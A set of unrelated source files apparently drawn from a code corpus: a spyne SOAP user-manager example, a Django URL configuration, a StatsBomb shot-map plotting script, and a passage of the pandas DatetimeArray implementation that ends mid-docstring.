the-stack_106_23214 | #!/usr/bin/env python
# encoding: utf8
#
# Copyright © Burak Arslan <burak at arskom dot com dot tr>,
# Arskom Ltd. http://www.arskom.com.tr
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the owner nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
'''
This example shows how to define and use complex structures
in spyne. This example uses an extremely simple in-memory
dictionary to store the User objects.
'''
import logging
from spyne.application import Application
from spyne.decorator import srpc
from spyne.interface.wsdl import Wsdl11
from spyne.protocol.soap import Soap11
from spyne.service import ServiceBase
from spyne.model.complex import Array
from spyne.model.complex import ComplexModel
from spyne.model.primitive import Integer
from spyne.model.primitive import String
from spyne.server.wsgi import WsgiApplication
from spyne.error import ResourceNotFoundError
user_database = {}
userid_seq = 1
class Permission(ComplexModel):
__namespace__ = "permission"
app = String(values=['library', 'delivery', 'accounting'])
perms = String(min_occurs=1, max_occurs=2, values=['read','write'])
class User(ComplexModel):
__namespace__ = "user"
userid = Integer
username = String
firstname = String
lastname = String
permissions = Array(Permission)
# add superuser to the 'database'
user_database[0] = User(
userid=0,
username='root',
firstname='Super',
lastname='User',
permissions=[
Permission(app='library', perms=['read', 'write']),
Permission(app='delivery', perms=['read', 'write']),
Permission(app='accounting', perms=['read', 'write']),
]
)
class UserManager(ServiceBase):
@srpc(User, _returns=Integer)
def add_user(user):
global user_database
global userid_seq
user.userid = userid_seq
userid_seq = userid_seq + 1
user_database[user.userid] = user
return user.userid
@srpc(_returns=User)
def super_user():
return user_database[0]
@srpc(Integer, _returns=User)
def get_user(userid):
global user_database
# If you rely on the dict lookup raising KeyError here, you'll return an
# internal error to the client, which tells the client that there's
# something wrong with the server. However, in this case a KeyError means
# an invalid request, so it's best to return a client error.
# For the HttpRpc case, internal error is 500 whereas
# ResourceNotFoundError is 404.
if not (userid in user_database):
raise ResourceNotFoundError(userid)
return user_database[userid]
@srpc(User)
def modify_user(user):
global user_database
if not (user.userid in user_database):
raise ResourceNotFoundError(user.userid)
user_database[user.userid] = user
@srpc(Integer)
def delete_user(userid):
global user_database
if not (userid in user_database):
raise ResourceNotFoundError(userid)
del user_database[userid]
@srpc(_returns=Array(User))
def list_users():
global user_database
return user_database.values()
if __name__=='__main__':
from wsgiref.simple_server import make_server
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('spyne.protocol.xml').setLevel(logging.DEBUG)
application = Application([UserManager], 'spyne.examples.complex',
interface=Wsdl11(), in_protocol=Soap11(), out_protocol=Soap11())
server = make_server('127.0.0.1', 7789, WsgiApplication(application))
logging.info("listening to http://127.0.0.1:7789")
logging.info("wsdl is at: http://localhost:7789/?wsdl")
server.serve_forever()
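# Client-side sketch (not part of the original example; run it from a separate
# interpreter while the server above is up, and it assumes the third-party
# 'suds' SOAP client package is installed):
#
#   from suds.client import Client
#   client = Client('http://localhost:7789/?wsdl')
#   print(client.service.super_user())
#   print(client.service.get_user(0))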
|
the-stack_106_23216 |
from django.conf.urls import url
from django.urls import path, include, re_path
from posts.views import post_create,post_detail,post_list,post_update,post_delete
urlpatterns = [
re_path(r'^$',post_list,name='list'),
re_path(r'^create/$',post_create),
re_path(r'^(?P<slug>[\w-]+)/$',post_detail,name='detail'),
re_path(r'^(?P<slug>[\w-]+)/edit/$',post_update,name='update'),
re_path(r'^(?P<slug>[\w-]+)/delete/$',post_delete),
] |
the-stack_106_23217 | #Make a shot map and a pass map using Statsbomb data
#Set match id in match_id_required.
#Function to draw the pitch
import matplotlib.pyplot as plt
import numpy as np
#Size of the pitch in yards (!!!)
pitchLengthX=120
pitchWidthY=80
#ID for England vs Sweden Womens World Cup
match_id_required = 69301
home_team_required ="England Women's"
away_team_required ="Sweden Women's"
# Load in the data
# I took this from https://znstrider.github.io/2018-11-11-Getting-Started-with-StatsBomb-Data/
file_name=str(match_id_required)+'.json'
#Load in all match events
import json
with open('Statsbomb/data/events/'+file_name) as data_file:
#print (mypath+'events/'+file)
data = json.load(data_file)
#get the nested structure into a dataframe
#store the dataframe in a dictionary with the match id as key (remove '.json' from string)
from pandas.io.json import json_normalize
df = json_normalize(data, sep = "_").assign(match_id = file_name[:-5])
#A dataframe of shots
shots = df.loc[df['type_name'] == 'Shot'].set_index('id')
#Draw the pitch
from FCPython import createPitch
(fig,ax) = createPitch(pitchLengthX,pitchWidthY,'yards','gray')
#Plot the shots
for i,shot in shots.iterrows():
x=shot['location'][0]
y=shot['location'][1]
goal=shot['shot_outcome_name']=='Goal'
team_name=shot['team_name']
circleSize=2
#circleSize=np.sqrt(shot['shot_statsbomb_xg']*15)
if (team_name==home_team_required):
if goal:
shotCircle=plt.Circle((x,pitchWidthY-y),circleSize,color="red")
plt.text((x+1),pitchWidthY-y+1,shot['player_name'])
else:
shotCircle=plt.Circle((x,pitchWidthY-y),circleSize,color="red")
shotCircle.set_alpha(.2)
elif (team_name==away_team_required):
if goal:
shotCircle=plt.Circle((pitchLengthX-x,y),circleSize,color="blue")
plt.text((pitchLengthX-x+1),y+1,shot['player_name'])
else:
shotCircle=plt.Circle((pitchLengthX-x,y),circleSize,color="blue")
shotCircle.set_alpha(.2)
ax.add_patch(shotCircle)
plt.text(5,75,away_team_required + ' shots')
plt.text(80,75,home_team_required + ' shots')
fig.set_size_inches(10, 7)
fig.savefig('Output/shots.pdf', dpi=100)
plt.show()
#Exercise:
#1, Create a dataframe of passes which contains all the passes in the match
#2, Plot the start point of every Sweden pass. Attacking left to right.
#3, Plot only passes made by Caroline Seger (she is Sara Caroline Seger in the database)
#4, Plot arrows to show where the passes went
#(a hedged starting sketch for exercises 1 and 2 follows below)
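#A minimal sketch for exercises 1 and 2 above (an illustrative starting point,
#not the official solution). It only reuses objects already defined in this
#script: df, createPitch, pitchLengthX, pitchWidthY and away_team_required.
passes = df.loc[df['type_name'] == 'Pass'].set_index('id')
(fig_p, ax_p) = createPitch(pitchLengthX, pitchWidthY, 'yards', 'gray')
for i, a_pass in passes.iterrows():
    if a_pass['team_name'] != away_team_required:
        continue
    #Plot the start point of every Sweden pass, attacking left to right
    x = a_pass['location'][0]
    y = a_pass['location'][1]
    passCircle = plt.Circle((x, pitchWidthY - y), 1, color="blue")
    passCircle.set_alpha(.3)
    ax_p.add_patch(passCircle)
fig_p.set_size_inches(10, 7)
plt.show()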
|
the-stack_106_23218 | # -*- coding: utf-8 -*-
from datetime import datetime, time
import warnings
import numpy as np
from pytz import utc
from pandas._libs import lib, tslib
from pandas._libs.tslib import Timestamp, NaT, iNaT
from pandas._libs.tslibs import (
normalize_date,
conversion, fields, timezones,
resolution as libresolution)
from pandas.util._decorators import cache_readonly, Appender
from pandas.errors import PerformanceWarning
from pandas import compat
from pandas.core.dtypes.common import (
_NS_DTYPE,
is_object_dtype,
is_int64_dtype,
is_datetime64tz_dtype,
is_datetime64_dtype)
from pandas.core.dtypes.dtypes import DatetimeTZDtype
from pandas.core.dtypes.missing import isna
from pandas.core.dtypes.generic import ABCIndexClass, ABCSeries
import pandas.core.common as com
from pandas.core.algorithms import checked_add_with_arr
from pandas.core import ops
from pandas.tseries.frequencies import to_offset, get_period_alias
from pandas.tseries.offsets import Tick, generate_range
from pandas.core.arrays import datetimelike as dtl
_midnight = time(0, 0)
def _to_m8(key, tz=None):
"""
Timestamp-like => dt64
"""
if not isinstance(key, Timestamp):
# this also converts strings
key = Timestamp(key, tz=tz)
return np.int64(conversion.pydt_to_i8(key)).view(_NS_DTYPE)
def _field_accessor(name, field, docstring=None):
def f(self):
values = self.asi8
if self.tz is not None:
if self.tz is not utc:
values = self._local_timestamps()
if field in self._bool_ops:
if field.endswith(('start', 'end')):
freq = self.freq
month_kw = 12
if freq:
kwds = freq.kwds
month_kw = kwds.get('startingMonth', kwds.get('month', 12))
result = fields.get_start_end_field(values, field,
self.freqstr, month_kw)
else:
result = fields.get_date_field(values, field)
# these return a boolean by-definition
return result
if field in self._object_ops:
result = fields.get_date_name_field(values, field)
result = self._maybe_mask_results(result, fill_value=None)
else:
result = fields.get_date_field(values, field)
result = self._maybe_mask_results(result, fill_value=None,
convert='float64')
return result
f.__name__ = name
f.__doc__ = docstring
return property(f)
def _dt_array_cmp(cls, op):
"""
Wrap comparison operations to convert datetime-like to datetime64
"""
opname = '__{name}__'.format(name=op.__name__)
nat_result = True if opname == '__ne__' else False
def wrapper(self, other):
meth = getattr(dtl.DatetimeLikeArrayMixin, opname)
if isinstance(other, (datetime, np.datetime64, compat.string_types)):
if isinstance(other, (datetime, np.datetime64)):
# GH#18435 strings get a pass from tzawareness compat
self._assert_tzawareness_compat(other)
try:
other = _to_m8(other, tz=self.tz)
except ValueError:
# string that cannot be parsed to Timestamp
return ops.invalid_comparison(self, other, op)
result = meth(self, other)
if isna(other):
result.fill(nat_result)
elif lib.is_scalar(other):
return ops.invalid_comparison(self, other, op)
else:
if isinstance(other, list):
try:
other = type(self)(other)
except ValueError:
other = np.array(other, dtype=np.object_)
elif not isinstance(other, (np.ndarray, ABCIndexClass, ABCSeries,
DatetimeArrayMixin)):
# Following Timestamp convention, __eq__ is all-False
# and __ne__ is all True, others raise TypeError.
return ops.invalid_comparison(self, other, op)
if is_object_dtype(other):
result = op(self.astype('O'), np.array(other))
o_mask = isna(other)
elif not (is_datetime64_dtype(other) or
is_datetime64tz_dtype(other)):
# e.g. is_timedelta64_dtype(other)
return ops.invalid_comparison(self, other, op)
else:
self._assert_tzawareness_compat(other)
if not hasattr(other, 'asi8'):
# ndarray, Series
other = type(self)(other)
result = meth(self, other)
o_mask = other._isnan
result = com.values_from_object(result)
# Make sure to pass an array to result[...]; indexing with
# Series breaks with older version of numpy
o_mask = np.array(o_mask)
if o_mask.any():
result[o_mask] = nat_result
if self.hasnans:
result[self._isnan] = nat_result
return result
return compat.set_function_name(wrapper, opname, cls)
class DatetimeArrayMixin(dtl.DatetimeLikeArrayMixin):
"""
Assumes that subclass __new__/__init__ defines:
tz
_freq
_data
"""
_typ = "datetimearray"
_bool_ops = ['is_month_start', 'is_month_end',
'is_quarter_start', 'is_quarter_end', 'is_year_start',
'is_year_end', 'is_leap_year']
_object_ops = ['weekday_name', 'freq', 'tz']
# dummy attribute so that datetime.__eq__(DatetimeArray) defers
# by returning NotImplemented
timetuple = None
# ensure that operations with numpy arrays defer to our implementation
__array_priority__ = 1000
# -----------------------------------------------------------------
# Constructors
_attributes = ["freq", "tz"]
_tz = None
_freq = None
@classmethod
def _simple_new(cls, values, freq=None, tz=None, **kwargs):
"""
we require that we have a dtype compatible with the values;
if we are passed values with an incompatible dtype, coerce using the constructor
"""
assert isinstance(values, np.ndarray), type(values)
if values.dtype == 'i8':
# for compat with datetime/timedelta/period shared methods,
# we can sometimes get here with int64 values. These represent
# nanosecond UTC (or tz-naive) unix timestamps
values = values.view('M8[ns]')
assert values.dtype == 'M8[ns]', values.dtype
result = object.__new__(cls)
result._data = values
result._freq = freq
tz = timezones.maybe_get_tz(tz)
result._tz = timezones.tz_standardize(tz)
return result
def __new__(cls, values, freq=None, tz=None, dtype=None):
if tz is None and hasattr(values, 'tz'):
# e.g. DatetimeIndex
tz = values.tz
if freq is None and hasattr(values, "freq"):
# i.e. DatetimeArray, DatetimeIndex
freq = values.freq
freq, freq_infer = dtl.maybe_infer_freq(freq)
# if dtype has an embedded tz, capture it
tz = dtl.validate_tz_from_dtype(dtype, tz)
if isinstance(values, DatetimeArrayMixin):
# extract nanosecond unix timestamps
values = values.asi8
if values.dtype == 'i8':
values = values.view('M8[ns]')
assert isinstance(values, np.ndarray), type(values)
assert is_datetime64_dtype(values) # not yet assured nanosecond
values = conversion.ensure_datetime64ns(values, copy=False)
result = cls._simple_new(values, freq=freq, tz=tz)
if freq_infer:
result.freq = to_offset(result.inferred_freq)
# NB: Among other things not yet ported from the DatetimeIndex
# constructor, this does not call _deepcopy_if_needed
return result
@classmethod
def _generate_range(cls, start, end, periods, freq, tz=None,
normalize=False, ambiguous='raise', closed=None):
periods = dtl.validate_periods(periods)
if freq is None and any(x is None for x in [periods, start, end]):
raise ValueError('Must provide freq argument if no data is '
'supplied')
if com.count_not_none(start, end, periods, freq) != 3:
raise ValueError('Of the four parameters: start, end, periods, '
'and freq, exactly three must be specified')
freq = to_offset(freq)
if start is not None:
start = Timestamp(start)
if end is not None:
end = Timestamp(end)
if start is None and end is None:
if closed is not None:
raise ValueError("Closed has to be None if not both of start"
"and end are defined")
left_closed, right_closed = dtl.validate_endpoints(closed)
start, end, _normalized = _maybe_normalize_endpoints(start, end,
normalize)
tz, _ = _infer_tz_from_endpoints(start, end, tz)
if tz is not None:
# Localize the start and end arguments
start = _maybe_localize_point(
start, getattr(start, 'tz', None), start, freq, tz
)
end = _maybe_localize_point(
end, getattr(end, 'tz', None), end, freq, tz
)
if start and end:
# Make sure start and end have the same tz
start = _maybe_localize_point(
start, start.tz, end.tz, freq, tz
)
end = _maybe_localize_point(
end, end.tz, start.tz, freq, tz
)
if freq is not None:
# TODO: consider re-implementing _cached_range; GH#17914
index = _generate_regular_range(cls, start, end, periods, freq)
if tz is not None and index.tz is None:
arr = conversion.tz_localize_to_utc(
index.asi8,
tz, ambiguous=ambiguous)
index = cls(arr)
# index is localized datetime64 array -> have to convert
# start/end as well to compare
if start is not None:
start = start.tz_localize(tz).asm8
if end is not None:
end = end.tz_localize(tz).asm8
else:
# Create a linearly spaced date_range in local time
arr = np.linspace(start.value, end.value, periods)
index = cls._simple_new(
arr.astype('M8[ns]', copy=False), freq=None, tz=tz
)
if not left_closed and len(index) and index[0] == start:
index = index[1:]
if not right_closed and len(index) and index[-1] == end:
index = index[:-1]
return cls._simple_new(index.asi8, freq=freq, tz=tz)
# -----------------------------------------------------------------
# Descriptive Properties
@property
def _box_func(self):
return lambda x: Timestamp(x, freq=self.freq, tz=self.tz)
@cache_readonly
def dtype(self):
if self.tz is None:
return _NS_DTYPE
return DatetimeTZDtype('ns', self.tz)
@property
def tz(self):
# GH 18595
return self._tz
@tz.setter
def tz(self, value):
# GH 3746: Prevent localizing or converting the index by setting tz
raise AttributeError("Cannot directly set timezone. Use tz_localize() "
"or tz_convert() as appropriate")
@property
def tzinfo(self):
"""
Alias for tz attribute
"""
return self.tz
@property # NB: override with cache_readonly in immutable subclasses
def _timezone(self):
""" Comparable timezone both for pytz / dateutil"""
return timezones.get_timezone(self.tzinfo)
@property
def offset(self):
"""get/set the frequency of the instance"""
msg = ('{cls}.offset has been deprecated and will be removed '
'in a future version; use {cls}.freq instead.'
.format(cls=type(self).__name__))
warnings.warn(msg, FutureWarning, stacklevel=2)
return self.freq
@offset.setter
def offset(self, value):
"""get/set the frequency of the instance"""
msg = ('{cls}.offset has been deprecated and will be removed '
'in a future version; use {cls}.freq instead.'
.format(cls=type(self).__name__))
warnings.warn(msg, FutureWarning, stacklevel=2)
self.freq = value
@property # NB: override with cache_readonly in immutable subclasses
def is_normalized(self):
"""
Returns True if all of the dates are at midnight ("no time")
"""
return conversion.is_date_array_normalized(self.asi8, self.tz)
@property # NB: override with cache_readonly in immutable subclasses
def _resolution(self):
return libresolution.resolution(self.asi8, self.tz)
# ----------------------------------------------------------------
# Array-Like / EA-Interface Methods
def __array__(self, dtype=None):
if is_object_dtype(dtype):
return np.array(list(self), dtype=object)
elif is_int64_dtype(dtype):
return self.asi8
# TODO: warn that conversion may be lossy?
return self._data.view(np.ndarray) # follow Index.__array__
def __iter__(self):
"""
Return an iterator over the boxed values
Yields
-------
tstamp : Timestamp
"""
# convert in chunks of 10k for efficiency
data = self.asi8
length = len(self)
chunksize = 10000
chunks = int(length / chunksize) + 1
for i in range(chunks):
start_i = i * chunksize
end_i = min((i + 1) * chunksize, length)
converted = tslib.ints_to_pydatetime(data[start_i:end_i],
tz=self.tz, freq=self.freq,
box="timestamp")
for v in converted:
yield v
# ----------------------------------------------------------------
# ExtensionArray Interface
@property
def _ndarray_values(self):
return self._data
@Appender(dtl.DatetimeLikeArrayMixin._validate_fill_value.__doc__)
def _validate_fill_value(self, fill_value):
if isna(fill_value):
fill_value = iNaT
elif isinstance(fill_value, (datetime, np.datetime64)):
self._assert_tzawareness_compat(fill_value)
fill_value = Timestamp(fill_value).value
else:
raise ValueError("'fill_value' should be a Timestamp. "
"Got '{got}'.".format(got=fill_value))
return fill_value
# -----------------------------------------------------------------
# Comparison Methods
_create_comparison_method = classmethod(_dt_array_cmp)
def _has_same_tz(self, other):
zzone = self._timezone
# vzone shouldn't be None if value is non-datetime like
if isinstance(other, np.datetime64):
# convert to Timestamp as np.datetime64 doesn't have tz attr
other = Timestamp(other)
vzone = timezones.get_timezone(getattr(other, 'tzinfo', '__no_tz__'))
return zzone == vzone
def _assert_tzawareness_compat(self, other):
# adapted from _Timestamp._assert_tzawareness_compat
other_tz = getattr(other, 'tzinfo', None)
if is_datetime64tz_dtype(other):
# Get tzinfo from Series dtype
other_tz = other.dtype.tz
if other is NaT:
# pd.NaT quacks both aware and naive
pass
elif self.tz is None:
if other_tz is not None:
raise TypeError('Cannot compare tz-naive and tz-aware '
'datetime-like objects.')
elif other_tz is None:
raise TypeError('Cannot compare tz-naive and tz-aware '
'datetime-like objects')
# -----------------------------------------------------------------
# Arithmetic Methods
def _sub_datetime_arraylike(self, other):
"""subtract DatetimeArray/Index or ndarray[datetime64]"""
if len(self) != len(other):
raise ValueError("cannot add indices of unequal length")
if isinstance(other, np.ndarray):
assert is_datetime64_dtype(other)
other = type(self)(other)
if not self._has_same_tz(other):
# require tz compat
raise TypeError("{cls} subtraction must have the same "
"timezones or no timezones"
.format(cls=type(self).__name__))
self_i8 = self.asi8
other_i8 = other.asi8
new_values = checked_add_with_arr(self_i8, -other_i8,
arr_mask=self._isnan)
if self.hasnans or other.hasnans:
mask = (self._isnan) | (other._isnan)
new_values[mask] = iNaT
return new_values.view('timedelta64[ns]')
def _add_offset(self, offset):
assert not isinstance(offset, Tick)
try:
if self.tz is not None:
values = self.tz_localize(None)
else:
values = self
result = offset.apply_index(values)
if self.tz is not None:
result = result.tz_localize(self.tz)
except NotImplementedError:
warnings.warn("Non-vectorized DateOffset being applied to Series "
"or DatetimeIndex", PerformanceWarning)
result = self.astype('O') + offset
return type(self)(result, freq='infer')
def _sub_datetimelike_scalar(self, other):
# subtract a datetime from myself, yielding a ndarray[timedelta64[ns]]
assert isinstance(other, (datetime, np.datetime64))
assert other is not NaT
other = Timestamp(other)
if other is NaT:
return self - NaT
if not self._has_same_tz(other):
# require tz compat
raise TypeError("Timestamp subtraction must have the same "
"timezones or no timezones")
i8 = self.asi8
result = checked_add_with_arr(i8, -other.value,
arr_mask=self._isnan)
result = self._maybe_mask_results(result)
return result.view('timedelta64[ns]')
def _add_delta(self, delta):
"""
Add a timedelta-like, Tick, or TimedeltaIndex-like object
to self, yielding a new DatetimeArray
Parameters
----------
other : {timedelta, np.timedelta64, Tick,
TimedeltaIndex, ndarray[timedelta64]}
Returns
-------
result : DatetimeArray
"""
new_values = dtl.DatetimeLikeArrayMixin._add_delta(self, delta)
return type(self)(new_values, tz=self.tz, freq='infer')
# -----------------------------------------------------------------
# Timezone Conversion and Localization Methods
def _local_timestamps(self):
"""
Convert to an i8 (unix-like nanosecond timestamp) representation
while keeping the local timezone and not using UTC.
This is used to calculate time-of-day information as if the timestamps
were timezone-naive.
"""
return conversion.tz_convert(self.asi8, utc, self.tz)
def tz_convert(self, tz):
"""
Convert tz-aware Datetime Array/Index from one time zone to another.
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted
to this time zone of the Datetime Array/Index. A `tz` of None will
convert to UTC and remove the timezone information.
Returns
-------
normalized : same type as self
Raises
------
TypeError
If Datetime Array/Index is tz-naive.
See Also
--------
DatetimeIndex.tz : A timezone that has a variable offset from UTC.
DatetimeIndex.tz_localize : Localize tz-naive DatetimeIndex to a
given time zone, or remove timezone from a tz-aware DatetimeIndex.
Examples
--------
With the `tz` parameter, we can change the DatetimeIndex
to other time zones:
>>> dti = pd.DatetimeIndex(start='2014-08-01 09:00',
... freq='H', periods=3, tz='Europe/Berlin')
>>> dti
DatetimeIndex(['2014-08-01 09:00:00+02:00',
'2014-08-01 10:00:00+02:00',
'2014-08-01 11:00:00+02:00'],
dtype='datetime64[ns, Europe/Berlin]', freq='H')
>>> dti.tz_convert('US/Central')
DatetimeIndex(['2014-08-01 02:00:00-05:00',
'2014-08-01 03:00:00-05:00',
'2014-08-01 04:00:00-05:00'],
dtype='datetime64[ns, US/Central]', freq='H')
With the ``tz=None``, we can remove the timezone (after converting
to UTC if necessary):
>>> dti = pd.DatetimeIndex(start='2014-08-01 09:00',freq='H',
... periods=3, tz='Europe/Berlin')
>>> dti
DatetimeIndex(['2014-08-01 09:00:00+02:00',
'2014-08-01 10:00:00+02:00',
'2014-08-01 11:00:00+02:00'],
dtype='datetime64[ns, Europe/Berlin]', freq='H')
>>> dti.tz_convert(None)
DatetimeIndex(['2014-08-01 07:00:00',
'2014-08-01 08:00:00',
'2014-08-01 09:00:00'],
dtype='datetime64[ns]', freq='H')
"""
tz = timezones.maybe_get_tz(tz)
if self.tz is None:
# tz naive, use tz_localize
raise TypeError('Cannot convert tz-naive timestamps, use '
'tz_localize to localize')
# No conversion since timestamps are all UTC to begin with
return self._simple_new(self.asi8, tz=tz, freq=self.freq)
def tz_localize(self, tz, ambiguous='raise', nonexistent='raise',
errors=None):
"""
Localize tz-naive Datetime Array/Index to tz-aware
Datetime Array/Index.
This method takes a time zone (tz) naive Datetime Array/Index object
and makes this time zone aware. It does not move the time to another
time zone.
Time zone localization helps to switch from time zone aware to time
zone unaware objects.
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone to convert timestamps to. Passing ``None`` will
remove the time zone information preserving local time.
ambiguous : 'infer', 'NaT', bool array, default 'raise'
When clocks moved backward due to DST, ambiguous times may arise.
For example in Central European Time (UTC+01), when going from
03:00 DST to 02:00 non-DST, 02:30:00 local time occurs both at
00:30:00 UTC and at 01:30:00 UTC. In such a situation, the
`ambiguous` parameter dictates how ambiguous times should be
handled.
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False signifies a
non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times
nonexistent : 'shift', 'NaT' default 'raise'
A nonexistent time does not exist in a particular timezone
where clocks moved forward due to DST.
- 'shift' will shift the nonexistent times forward to the closest
existing time
- 'NaT' will return NaT where there are nonexistent times
- 'raise' will raise an NonExistentTimeError if there are
nonexistent times
.. versionadded:: 0.24.0
errors : {'raise', 'coerce'}, default None
- 'raise' will raise a NonExistentTimeError if a timestamp is not
valid in the specified time zone (e.g. due to a transition from
or to DST time). Use ``nonexistent='raise'`` instead.
- 'coerce' will return NaT if the timestamp can not be converted
to the specified time zone. Use ``nonexistent='NaT'`` instead.
.. deprecated:: 0.24.0
Returns
-------
result : same type as self
Array/Index converted to the specified time zone.
Raises
------
TypeError
If the Datetime Array/Index is tz-aware and tz is not None.
See Also
--------
DatetimeIndex.tz_convert : Convert tz-aware DatetimeIndex from
one time zone to another.
Examples
--------
>>> tz_naive = pd.date_range('2018-03-01 09:00', periods=3)
>>> tz_naive
DatetimeIndex(['2018-03-01 09:00:00', '2018-03-02 09:00:00',
'2018-03-03 09:00:00'],
dtype='datetime64[ns]', freq='D')
Localize DatetimeIndex in US/Eastern time zone:
>>> tz_aware = tz_naive.tz_localize(tz='US/Eastern')
>>> tz_aware
DatetimeIndex(['2018-03-01 09:00:00-05:00',
'2018-03-02 09:00:00-05:00',
'2018-03-03 09:00:00-05:00'],
dtype='datetime64[ns, US/Eastern]', freq='D')
With the ``tz=None``, we can remove the time zone information
while keeping the local time (not converted to UTC):
>>> tz_aware.tz_localize(None)
DatetimeIndex(['2018-03-01 09:00:00', '2018-03-02 09:00:00',
'2018-03-03 09:00:00'],
dtype='datetime64[ns]', freq='D')
Be careful with DST changes. When there is sequential data, pandas can
infer the DST time:
>>> s = pd.to_datetime(pd.Series([
... '2018-10-28 01:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 03:00:00',
... '2018-10-28 03:30:00']))
>>> s.dt.tz_localize('CET', ambiguous='infer')
2018-10-28 01:30:00+02:00 0
2018-10-28 02:00:00+02:00 1
2018-10-28 02:30:00+02:00 2
2018-10-28 02:00:00+01:00 3
2018-10-28 02:30:00+01:00 4
2018-10-28 03:00:00+01:00 5
2018-10-28 03:30:00+01:00 6
dtype: int64
In some cases, inferring the DST is impossible. In such cases, you can
pass an ndarray to the ambiguous parameter to set the DST explicitly
>>> s = pd.to_datetime(pd.Series([
... '2018-10-28 01:20:00',
... '2018-10-28 02:36:00',
... '2018-10-28 03:46:00']))
>>> s.dt.tz_localize('CET', ambiguous=np.array([True, True, False]))
0 2018-10-28 01:20:00+02:00
1 2018-10-28 02:36:00+02:00
2 2018-10-28 03:46:00+01:00
dtype: datetime64[ns, CET]
"""
if errors is not None:
warnings.warn("The errors argument is deprecated and will be "
"removed in a future release. Use "
"nonexistent='NaT' or nonexistent='raise' "
"instead.", FutureWarning)
if errors == 'coerce':
nonexistent = 'NaT'
elif errors == 'raise':
nonexistent = 'raise'
else:
raise ValueError("The errors argument must be either 'coerce' "
"or 'raise'.")
if nonexistent not in ('raise', 'NaT', 'shift'):
raise ValueError("The nonexistent argument must be one of 'raise',"
" 'NaT' or 'shift'")
if self.tz is not None:
if tz is None:
new_dates = conversion.tz_convert(self.asi8, 'UTC', self.tz)
else:
raise TypeError("Already tz-aware, use tz_convert to convert.")
else:
tz = timezones.maybe_get_tz(tz)
# Convert to UTC
new_dates = conversion.tz_localize_to_utc(
self.asi8, tz, ambiguous=ambiguous, nonexistent=nonexistent,
)
new_dates = new_dates.view(_NS_DTYPE)
return self._simple_new(new_dates, tz=tz, freq=self.freq)
# ----------------------------------------------------------------
# Conversion Methods - Vectorized analogues of Timestamp methods
def to_pydatetime(self):
"""
Return Datetime Array/Index as object ndarray of datetime.datetime
objects
Returns
-------
datetimes : ndarray
"""
return tslib.ints_to_pydatetime(self.asi8, tz=self.tz)
def normalize(self):
"""
Convert times to midnight.
The time component of the date-time is converted to midnight i.e.
00:00:00. This is useful in cases when the time does not matter.
Length is unaltered. The timezones are unaffected.
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on Datetime Array/Index.
Returns
-------
DatetimeArray, DatetimeIndex or Series
The same type as the original data. Series will have the same
name and index. DatetimeIndex will have the same name.
See Also
--------
floor : Floor the datetimes to the specified freq.
ceil : Ceil the datetimes to the specified freq.
round : Round the datetimes to the specified freq.
Examples
--------
>>> idx = pd.DatetimeIndex(start='2014-08-01 10:00', freq='H',
... periods=3, tz='Asia/Calcutta')
>>> idx
DatetimeIndex(['2014-08-01 10:00:00+05:30',
'2014-08-01 11:00:00+05:30',
'2014-08-01 12:00:00+05:30'],
dtype='datetime64[ns, Asia/Calcutta]', freq='H')
>>> idx.normalize()
DatetimeIndex(['2014-08-01 00:00:00+05:30',
'2014-08-01 00:00:00+05:30',
'2014-08-01 00:00:00+05:30'],
dtype='datetime64[ns, Asia/Calcutta]', freq=None)
"""
new_values = conversion.normalize_i8_timestamps(self.asi8, self.tz)
return type(self)(new_values, freq='infer').tz_localize(self.tz)
def to_period(self, freq=None):
"""
Cast to PeriodArray/Index at a particular frequency.
Converts DatetimeArray/Index to PeriodArray/Index.
Parameters
----------
freq : string or Offset, optional
One of pandas' :ref:`offset strings <timeseries.offset_aliases>`
or an Offset object. Will be inferred by default.
Returns
-------
PeriodArray/Index
Raises
------
ValueError
When converting a DatetimeArray/Index with non-regular values,
so that a frequency cannot be inferred.
Examples
--------
>>> df = pd.DataFrame({"y": [1,2,3]},
... index=pd.to_datetime(["2000-03-31 00:00:00",
... "2000-05-31 00:00:00",
... "2000-08-31 00:00:00"]))
>>> df.index.to_period("M")
PeriodIndex(['2000-03', '2000-05', '2000-08'],
dtype='period[M]', freq='M')
Infer the daily frequency
>>> idx = pd.date_range("2017-01-01", periods=2)
>>> idx.to_period()
PeriodIndex(['2017-01-01', '2017-01-02'],
dtype='period[D]', freq='D')
See Also
--------
pandas.PeriodIndex: Immutable ndarray holding ordinal values.
pandas.DatetimeIndex.to_pydatetime: Return DatetimeIndex as object.
"""
